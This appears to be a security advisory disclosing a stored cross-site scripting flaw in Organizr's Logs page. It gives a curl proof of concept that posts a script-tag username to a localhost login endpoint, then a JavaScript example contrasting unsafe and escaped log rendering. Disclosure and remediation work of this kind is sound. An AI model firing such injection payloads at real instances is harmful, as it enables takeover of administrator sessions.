XSS affecting "Logs" Page in causefx/organizr
Apr 5th 2022
Additional review found that the application did not appear to impose any limit on the payload's length. Given this, a threat actor could submit large and complex payloads.
Proof of Concept
# PoC.js
curl 'http://localhost/api/v2/login' -X POST \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Token: null' \
  -H 'formKey: $2y$10$7DQp3wVaXory9HSag3/qF.P8PULxQXV5kwEnwkCpsp/eZBAaVib4q' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://localhost' \
  -H 'Connection: keep-alive' \
  -H 'Referer: http://localhost/' \
  -H 'Cookie: organizrLanguage=en; organizr_user_uuid=38a2bb5e-3cd6-4156-a8bb-4eed8be6cf36' \
  --data-raw 'loginAttempts=1&tfaCode=&username=%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&password=asdf&remember=true&oAuth=&oAuthType=&formKey=%242y%2410%247DQp3wVaXory9HSag3%2FqF.P8PULxQXV5kwEnwkCpsp%2FeZBAaVib4q'
A review of Organizr's code found that this vulnerability lies in the logging functions. The "setLoggerChannel()" function calls "setupLogger()", which passes the user-supplied username into the "setTraceId()" call. The username should be escaped before it is passed to setTraceId().
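To make the fix concrete, here is an added JavaScript example (not Organizr's code) showing the pattern at fault, a user-controlled username flowing into a log trace id that is later rendered as HTML on the Logs page, beside its hardened form. makeTraceId, renderLogRowUnsafe and renderLogRowSafe are hypothetical stand-ins, and the trace-id character set and the 64-character cap are assumptions.

```javascript
// Added illustration, not Organizr's code: a log entry whose trace id is
// derived from a user-controlled username, rendered unsafely vs. safely.

// Minimal HTML escaper for the characters that matter in text/attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical stand-in for setTraceId(): restricts the trace id to a bounded,
// conservative character set (assumed here) so markup-bearing or oversized
// usernames never reach the log verbatim. This also addresses the missing
// length cutoff noted above.
const TRACE_ID_MAX = 64; // assumed cap
function makeTraceId(username) {
  const cleaned = String(username).replace(/[^A-Za-z0-9_.@-]/g, "_");
  return cleaned.slice(0, TRACE_ID_MAX);
}

// Vulnerable pattern: logged fields concatenated straight into Logs-page markup.
function renderLogRowUnsafe(entry) {
  return `<tr><td>${entry.traceId}</td><td>${entry.message}</td></tr>`;
}

// Hardened pattern: every logged field is escaped at the point it becomes HTML,
// regardless of whether it was sanitized when logged.
function renderLogRowSafe(entry) {
  return `<tr><td>${escapeHtml(entry.traceId)}</td><td>${escapeHtml(entry.message)}</td></tr>`;
}

// Constructed sample: the username from the PoC request above.
const sampleUsername = "<script>alert(2);</script>";
const rawEntry = { traceId: sampleUsername, message: "Login attempt failed" };
const sanitizedEntry = { traceId: makeTraceId(sampleUsername), message: "Login attempt failed" };

// Returns the three renderings so the difference can be inspected or asserted on.
function demo() {
  return {
    unsafe: renderLogRowUnsafe(rawEntry),          // script tag survives into the page
    safeSanitized: renderLogRowSafe(sanitizedEntry), // neutralised at logging time
    safeEscapedOnly: renderLogRowSafe(rawEntry),     // neutralised at render time
  };
}
```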
Given that this vulnerability can target high-level users, the impact is potentially severe. By leveraging it, a threat actor could create arbitrary users or make malicious changes to the system.